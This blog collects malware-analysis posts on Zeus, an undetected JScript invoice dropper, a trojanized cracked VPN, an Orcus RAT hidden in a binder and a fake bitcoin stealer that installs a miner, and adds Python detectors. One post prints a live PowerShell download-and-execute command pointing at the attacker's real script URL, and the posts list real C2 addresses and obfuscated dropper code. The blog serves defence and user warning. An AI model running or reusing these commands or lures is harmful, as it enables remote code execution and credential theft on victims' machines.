
Monday, 26 February 2018

Zeus botnet simple analysis

A short analysis of the Zeus botnet.

It was done for someone who wanted to see how it works, and I am sharing it with you.

bot.exe
  • OEP: 0040DCA0
  • COMPILER: Borland Delphi 6.0 – 7.0
  • MD5: 8a849d20c0a954f45566cec53acc9263
  • SHA-1: 764c29fd18c3f3c4d9ba3fe394655f2ed2ec0c01



Injects into remote processes
Injected into “explorer.exe”

Drops files:

giep.exe

MD5: 769919e56bd4e9e1e906559c1c36bdf6
SHA-1: 39ed72d34e02e1674742cb47bbd6ebdad13f7931
Reg: HKU\S-1-5-21-2442644137-1929233181-142757687-1000\Software\Microsoft\Windows\CurrentVersion\Run\{74A201A8-2DEE-69F0-F124-27DF3D9773DA}: “C:\Users\Insider\AppData\Roaming\Qioho\giep.exe”
https://www.virustotal.com/#/file/5069bc991ff37817bb05e6bb453c9c44d22ef2719bb0d4f72a3ca30c544f040c/detection

  • Same attributes as bot.exe

Some of the operations performed by bot.exe:
 
  • CreateFile
  • RegOpenKey
  • RegisterClass
  • CoCreate
  • CreateThread
  • RegCreateKey
  • RegSetValue
  • ProcessStarted
 
Network traffic:

In the same way, it uses POST requests to send the stolen data when the victim visits a bank account page, PayPal, etc.
Botnet host directory and login page:

H**p://xxx.xxx/adminpanel/admin.php

Removal is easy. You just have to follow the paths to find the dropped executables and delete the registry entries that were created.
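As an added example that is not part of the original post, the Python below applies the persistence pattern above to constructed Procmon-style events: a Run value named like a GUID, a target under AppData, and a target that the same session dropped. The bot.exe rows reuse the values from this post; the OneDrive row is a constructed benign control.

```python
import re

# Constructed sample events in Procmon style: (process, operation, path, data). The
# bot.exe rows reuse this post's values; the OneDrive row is a benign control.
SAMPLE_EVENTS = [
    ("bot.exe", "CreateFile",
     r"C:\Users\Insider\AppData\Roaming\Qioho\giep.exe", ""),
    ("bot.exe", "RegSetValue",
     r"HKU\S-1-5-21-2442644137-1929233181-142757687-1000\Software\Microsoft"
     r"\Windows\CurrentVersion\Run\{74A201A8-2DEE-69F0-F124-27DF3D9773DA}",
     r"C:\Users\Insider\AppData\Roaming\Qioho\giep.exe"),
    ("explorer.exe", "RegSetValue",
     r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"),
]

RUN_KEY_RE = re.compile(  # group(1) is the value name written under Run/RunOnce
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\([^\\]+)$", re.I)
# Zeus names its autostart value like a COM CLSID so that it looks legitimate.
GUID_NAME_RE = re.compile(r"^\{[0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12}\}$", re.I)
USER_WRITABLE_RE = re.compile(r"\\AppData\\(?:Roaming|Local)\\", re.I)  # user profile


def check_run_value(key_path, data):
    """Reasons why one RegSetValue looks like malware persistence ([] = benign)."""
    match = RUN_KEY_RE.search(key_path)
    if not match:
        return []  # not an autostart key at all
    reasons = []
    if GUID_NAME_RE.match(match.group(1)):
        reasons.append("Run value name is a GUID")
    if USER_WRITABLE_RE.search(data.strip('"')):
        reasons.append("autostart target lives under AppData")
    return reasons


def find_persistence(events):
    """Correlate file drops with Run-key writes and return the suspicious ones."""
    dropped = {}  # lower-cased path -> process that created it
    findings = []
    for process, operation, path, data in events:
        if operation == "CreateFile":
            dropped[path.lower()] = process
        elif operation == "RegSetValue":
            reasons = check_run_value(path, data)
            target = data.strip('"').lower()
            if target in dropped:
                reasons.append(f"target was dropped earlier by {dropped[target]}")
            if reasons:
                findings.append({"process": process, "key": path, "target": data, "reasons": reasons})
    return findings
```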

Wednesday, 6 December 2017

Unseen sample of malware – modified code – DarkWeb TOR project.

Hello.
Today I had a nice surprise. I found an email in the Spam folder telling me they had just sent me an electronic invoice.
I have to say that the surprises keep coming.

You will see!!!

Part 1 – The infected file & dropped files

Dear Madam / Madam,
We would like to inform you that you have an electronic invoice issued. The attachment is an official accounting document and complies with the requirements of the Electronic Document and Electronic Signature Act.
If you have additional questions or need other information, please do not hesitate to contact us with the contact details on your electronic invoice.
Thank you for being a customer of ENERGO-PRO.
We wish you a successful day.
* This email can contain personalized information. If you are not the recipient for whom it is intended, please delete it. Thank you!
I have an attached file named öá¬ÔŃÓá No 0258923817 (3)… yep, and it is a JScript file.
Scanned with VirusTotal.

The -1 vote is mine! (lol)
So 0 of 60 antivirus engines detect this virus. In the previous article I wrote about the problem of detection.
Security advice – the antivirus is just a security helper!
Running the öá¬ÔŃÓá No 0258923817 (3) script injects code into vbscript and tries to connect to the hosts below.
All the connections made while running this script:
  • withadvertisingthe.com
  • myip.opendns.com
  • noreply.org
  • riseup.ne
  • Faravahar Tor Authority Directory – 199.254.238.52
  • Tor Exit Router – 178.16.208.59
  • vps.net
  • 91.219.237.154
  • digitalocean.com
  • voxility.net
All are Tor servers and VPN servers.
GET /tor/status-vote/current/consensus from hosts:
86.59.21.38/154.35.175.225
There are BitBlinder Project files (see GitHub for more information). Remember this.. I will give you some good info later!
Connected servers:
5.149.213.224/86.59.21.38/199.254.238.52/154.35.175.225/178.16.208.59/46.23.72.81/91.219.237.154/46.101.183.160/93.115.84.143/165.227.130.167
What else can I show you from this file…
Last write session:
It makes a lot of changes after running:
  • Remote Access: tries to identify its external IP address
  • Stealer/Phishing: scans for artifacts that may help identify the target
  • Touched instant messenger related registry keys
  • Persistence: injects into explorer
  • Injects into remote processes
  • Modifies auto-execute functionality by setting/creating a value in the registry
  • Spawns a lot of processes
  • Writes data to a remote process
Dropped files:
  • adprtext.dll
  • agreebowl.dll
Let’s look at agreebowl.dll

Part 2 – The “öá¬ÔŃÓá No 0258923817 (3)” file code.

The 0/60 detection is due to the way the code is written. The programmer used an ingenious way to write the code so that its signature differs from that of known viruses.
Here I will show you a part of the code as it appears in the file:
ozen.decideWorry+sickCityAdditionDepth[15]+seriousPaidRegion.happened;}function pigDutyUnusual(passForeignPush){return lowerCountryCharacter[5];}function frontFurtherAfterMadeConstruction(wasMoodCleanRefusedPush){return slightForgotDiscussionHistoryGiant[3]+temperatureBeforeDo.audienceCircus+evidenceCompositionCrackPrincipalEar[2]+seriousPaidRegion.engineer+sickCityAdditionDepth[3]+sickCityAdditionDepth[4]+breatheCupParentEscape[13]+biggerShellsDeterminePorchCreature[7]+temperatureBeforeDo.twoWest+importanceArtAgain[7];}function compareSpeciesGiantBuildingSeveral(excitedCanScoreCarefulFine){return roughWhenPlentyDistanceFrozen.decideWorry+townOrdinaryDarkFlowerLibrary.careful+importanceArtAgain[7]+temperatureBeforeDo.audienceCircus+wonProvideMostOrdinaryRoad.railroadOr+slightForgotDiscussionHistoryGiant[7]+importanceArtAgain[7]+evidenceCompositionCrackPrincipalEar[2]+breatheCupParentEscape[17];}var clearlyPieceBillEarlierOrganization=[];
clearlyPieceBillEarlierOrganization[todayBehaviorStrengthQuietlyTypical('p-_sI1owb)jB:o6')](visitorBehindSpeak('9K0c0htw(o.kvr'));
var packageLargePig=[-314];
var tearsKitchenCatchNeck=[66];
var fifteenRunStraightSpeech=[];
var aidMirrorWeakProgressInclude=[7];
var sightDistanceDid=[1];
var taskAnywayHungry=[mightEmptyCarriedRapidlyOnce('26P:Y&kwgPLW0')];
function partRelatedBatBaby(metFreeSomeone){

Part 3 – BitBlinder project

BitBlinder project – A way to create your own hidden services on DarkWeb.
Project-specific files:
  • http://154.35.175.225/tor/status-vote/current/consensus.js
  • http://91.219.237.154/tor/server/fp/6a7479eb4378b946dc2a65a7f2c706b42bae2ebd
Well… that was a long story, and this is the end!
0/60 … remember that!!!

Have fun & Stay safe!!!

Friday, 1 December 2017

Malware research/reverse – Payload backdoor

Hello.
I have some free time and I try to deal with internet safety. I’m just a small drop in the ocean, but I’m here!
Today I will introduce you to something different.
As usual, I downloaded a few programs and started the analysis.
I have a ”great offer”:
Hotspot Shield VPN 7.20.8.Elite Cracked

Woooow!!! (just kidding)
We have 3 important files.
Setup.exe and Update.exe appear to be archive files, and from previous posts we know what this means, but today our target is the HSS v.2.exe file.



We notice that it is the most recently created file.
Also, the installation instructions require using this file.

OK. Let’s scan this time!
VirusTotal Report

20/68 detection?!?
I mean, only 20 of the antivirus engines see this file as a virus.


OK. It’s normal for it to be flagged by antivirus: it’s just a crack, a patch, etc. You have to disable the antivirus to install it; it’s just pirated software.
Let’s get started.
It looks like this .exe is actually a .rar archive.

After opening it, it does a lot of work in the background.
We let it do its job so we can find out what it is doing!


When everything is quiet, we see that something is still running.

powershell.exe -nop -windowstyle Hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1')"
The virus runs through powershell.exe, which connects to external sources:
h**ps://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1
Also connecting to:
http://83.251.132.4
/admin/get.php
/login/process.php
/news.php
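As an added example (not from the original post), here is a Python triage routine for process-creation logs that scores PowerShell command lines on the traits seen above: profile suppressed, hidden window, and a download-and-IEX cradle. The log records and the URLs in them are constructed; the gist URL from this post is replaced with a placeholder.

```python
import re

# Constructed process-creation records: (parent process, command line). The first
# mirrors the cradle seen in this post with a placeholder URL, the second is a
# benign admin script, the third uses abbreviated switches and aliases.
SAMPLE_EVENTS = [
    ("HSS v.2.exe",
     "powershell.exe -nop -windowstyle Hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('https://example.invalid/raw/stage.ps1')\""),
    ("explorer.exe",
     "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
    ("cmd.exe",
     "powershell.exe -w hidden -c \"iwr http://198.51.100.7/admin/get.php | iex\""),
]

# PowerShell accepts any unambiguous prefix of a switch name, so match on prefixes.
INDICATORS = {
    "no_profile":    re.compile(r"(?:^|\s)-nop\w*", re.I),
    "hidden_window": re.compile(r"(?:^|\s)-w\w*\s+hidden", re.I),
    "encoded":       re.compile(r"(?:^|\s)-e(?:nc\w*|c)?\b", re.I),
    "downloader":    re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "eval":          re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"\)]+", re.I)


def assess(cmdline):
    """Classify one PowerShell command line and pull out the URLs worth blocking."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    cradle = "downloader" in hits and "eval" in hits  # fetch-and-execute in one line
    stealth = "no_profile" in hits or "hidden_window" in hits
    payload = any(h in hits for h in ("downloader", "eval", "encoded"))
    return {"hits": hits, "urls": URL_RE.findall(cmdline),
            "suspicious": cradle or (stealth and payload)}


def triage(events):
    """Return (parent, assessment) for every command line judged suspicious."""
    results = []
    for parent, cmdline in events:
        verdict = assess(cmdline)
        if verdict["suspicious"]:
            results.append((parent, verdict))
    return results
```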

After investigating, I found out that it is about a payload project: PowerShell Empire.

Currently PowerShell Empire has the following module categories:
  • Code Execution – Ways to run more code
  • Collection – Post exploitation data collection
  • Credentials – Collect and use creds
  • Exfiltration – Identify egress channels
  • Lateral Movement – Move around the network
  • Management – Host management and auxiliary
  • Persistence – Survive reboots
  • Privesc – Privilege escalation capabilities
  • Recon – Test further entry points (HTTP Basic Auth etc)
  • Situational Awareness – Network awareness
  • Trollsploit – For the lulz
Prodefence.org
What can I say… be careful!
Have fun & stay safe!!!

Wednesday, 22 November 2017

Malware reverse – RAT backdoor

Hello again.
After testing a few files, I found something good to analyze.
On hacking or warez forums, you find a lot of infected files.
Today I analyzed a program used by hackers to hide their viruses: a binder, which combines two files so that when it is used, one is visible and the other runs hidden.

Although the one who posted the software announced it as a cracked version, it still seems strange that the name is Celeste instead of Celesty, and the details are completely missing.
After a brief analysis I realized that the software already contains two files, both executables, that is, exactly what the Celesty software is meant to produce.


The executables seem to be the Celesty software and something called Encrypt, and if we remember the role of the binder, we understand that Celesty will appear on the screen while Encrypt will be hidden.
Analyzed in more detail, we can see that Celest’s resources are exactly the two hidden files.
OK. If you think things have become complicated… wait a little longer.
Moving on to more advanced techniques, I was able to discover what’s going on beyond that first downloaded software.
Do you remember how it all started?
A .rar file… An .exe extracted from it… Two hidden files.
Now look at my reverse malware folder!

Quite interesting!
I double click like a victim would and let the executables do what they want.
Now that everything seems quiet, I can see that the OrcusWatchdog process does not want to stop: even if you kill it, its “Keep alive” function brings it back to life.

Okay, let’s see what’s going on.
Celest_Binder looked OK at first, but what it brings with it is not good for the computer.

Drops executable files:
  • OrcusWatchdog.exe
  • CELESTY.EXE
  • ENCRYPT.EXE
  • svchost_.exe
  • sbziixqt.dll
  • RESD05E.tmp
  • ENCRYPT file
Creates fake process: Users\vchost\svchost.exe
Creates new process: AppData\OrcusWatchdog.exe
Writes data to a remote process:
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
OrcusWatchdog
Playing with:
  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config
  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
svchost_
  • Contains the ability to manipulate the desktop.
  • Password stealing functions.
  • Records keyboard strokes.
So, without going into too much detail, I can tell you it’s a remote administration tool* that can do the following:
Control
  • Basic information about the client (operating system, language, privileges, path, IP address, …)
  • Uninstall, Kill, Make Admin
Computer
  • Get a lot of information about the client’s PC
  • Categories: Operating System, System, BIOS, Hardware (Processor, Video card), Software, Network (local addresses, geolocation data), Drives
Passwords
  • Recover passwords from well-known applications (Google Chrome, Mozilla Firefox, FileZilla, Internet Explorer, JDownloader, Opera, Thunderbird, WinSCP, Pidgin, …)
  • Recover cookies from web browsers (Google Chrome, Mozilla Firefox, Yandex)
File Explorer
  • Interface like the Windows file explorer
  • Download, rename, create or remove files and directories
  • Download directly to the server
  • Execute files with arguments, verbs and other settings
  • Show properties of files (size, dates, details like the size of a picture or the bitrate of a video) and calculate hash values (MD5, SHA1, SHA256, SHA512)
  • Upload files
  • Open Console here
  • Go back/forward
  • Pinned folders of the client’s system are added directly to the tree view (Dropbox, OneDrive, Creative Cloud Files, etc.)
  • Support for special folders like the recycle bin
  • Search for files in the current folder
  • Enter the path directly or select it with autocomplete and a drop-down
Programs
  • Receive all installed programs
  • Start the uninstaller of a program
  • Open path in File Explorer
… and a lot more!*
That’s the situation!
Things are not as they seem, and do not forget:
When something is free, you are not the customer but the product!


Have fun & Stay Safe!!!

*Orcus Remote Admin

Tuesday, 24 October 2017

Fake bitcoin wallet stealer – Silent miner backdoor – Reverse

I found another backdoored piece of software. This one was made for those who want to become hackers… or to make some easy money.
Found on Youtube.com with the search ”Bitcoin stealer”.
How to use it… the uploader helps you.

The uploader’s instructions (originally in Portuguese, translated below):

  • Password: Techup
  • Disable Antivirus (Of course, this is a hack)
  • Key
  • Connection Server
  • Add to your wallet
  • Use Proxy
  • Accept the terms
  • Make sure the program is up to date

All you have to do is download it, run it and you become a rich guy…
We will not double click the .exe file… (it looks like a .exe).. or, better said, this SFX rar archive?!?
Let’s see something about the archive with right click and Properties!
I don’t like this SILENT=1. LOL. If we don’t run the ”.exe”, the backdoor will not run in the background, so let’s extract it… and surprise.. there is more than one file, including the backdoor files:
winhlp32.exe
Isass.exe
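As an added example (not from the original post), the Python below parses an SFX script comment of the kind shown on the archive’s Properties page and flags the traits from this post: Silent=1, more than one Setup= program, and a program name that imitates a system process (Isass.exe for lsass.exe). The comment text is constructed; the WinRAR SFX command names Setup, Silent and Path are real.

```python
# Constructed SFX script comment in WinRAR style (not copied from the post). WinRAR shows
# it on the Comment tab of Properties; Setup= lines run after extraction, Silent=1 hides the UI.
SAMPLE_SFX_COMMENT = """;The comment below contains SFX script commands

Path=%AppData%\\Blockchain
Setup=winhlp32.exe
Setup=Isass.exe
Silent=1
"""

SYSTEM_NAMES = {"lsass.exe", "svchost.exe", "csrss.exe", "winlogon.exe", "explorer.exe"}
# Characters commonly swapped for look-alikes in fake system process names.
HOMOGLYPHS = str.maketrans({"i": "l", "1": "l", "0": "o"})


def parse_sfx_script(comment):
    """Return {key_lower: [values]} for every Key=Value line; ';' lines are comments."""
    script = {}
    for line in comment.splitlines():
        line = line.strip()
        if not line or line.startswith(";") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        script.setdefault(key.strip().lower(), []).append(value.strip())
    return script


def lookalike_of(program):
    """System process a file name imitates (Isass.exe -> lsass.exe), else None."""
    name = program.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if name in SYSTEM_NAMES:
        return None  # it is the real name, not an imitation
    folded = name.translate(HOMOGLYPHS)
    return folded if folded in SYSTEM_NAMES else None


def assess_sfx(comment):
    """List the reasons an SFX script looks like a dropper ([] = nothing odd)."""
    script = parse_sfx_script(comment)
    findings = []
    if "1" in script.get("silent", []):
        findings.append("Silent=1 hides the start dialog and extraction progress")
    if any(p.lower().startswith(("%appdata%", "%temp%")) for p in script.get("path", [])):
        findings.append("extracts into the user profile instead of Program Files")
    setups = script.get("setup", [])
    if len(setups) > 1:
        findings.append(f"{len(setups)} Setup= programs run after extraction: " + ", ".join(setups))
    for program in setups:
        target = lookalike_of(program)
        if target:
            findings.append(f"{program} imitates the system process {target}")
    return findings
```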

After reversing the backdoor files I found this:
C:/Users/user/Documents/projects/minergate.app/sources/cudaminer/src/cuda_cryptonight_core.cu
… so what about this minergate?!?
With this lovely usage:
Usage:
minergate-cli [-version] -user <email> [-proxy <url>] -<currency> <threads> [<gpu intensity>] [-<currency> <threads> [<gpu intensity>] …] [-o <pool> -u <login> [-t <threads>] [-i <gpu intensity>]]
And so many options:
Options:
-user account email from minergate.com
proxy server URL. Supports only socks protocols (for example: socks://192.168.0.1:1080
possible values: bcn xmr qcn xdn fcn mcn aeon dsh inf8 <mm_cc>+bcn <mm_cc>+xmr <mm_cc>+qcn <mm_cc>+xdn <mm_cc>+aeon <mm_cc>+dsh. Where <mm_cc> is fcn or mcn
threads count for specified currency
GPU mining intensity (NVidia only) (values range: 1..4. Recommended: 2)
mining pool URL
mining pool login
CPU threads count
GPU mining intensity
Connecting to: h**ps://minergate.com
It seems that we have a nicely backdoored piece of software.
After you run it, a silent miner will be installed on your computer in the background, and in front of you a nice error like this will appear:
Blockchain Wallet Stealer 2017\message.vbs
x=msgbox("Hardware is not compatible, try on another PC or restart and run with disabled antivirus.", 0+16, "Error")
If you don’t understand: you download this software, after the first run an error message appears and it does not work, but underneath a virus has already been installed.
This time the virus is a silent miner that will use your computer to work for some hacker and help him make some bitcoins.
The YouTube channel Teck up has more videos like this one.. and all of them come with this backdoor.

Have fun & Stay safe!!!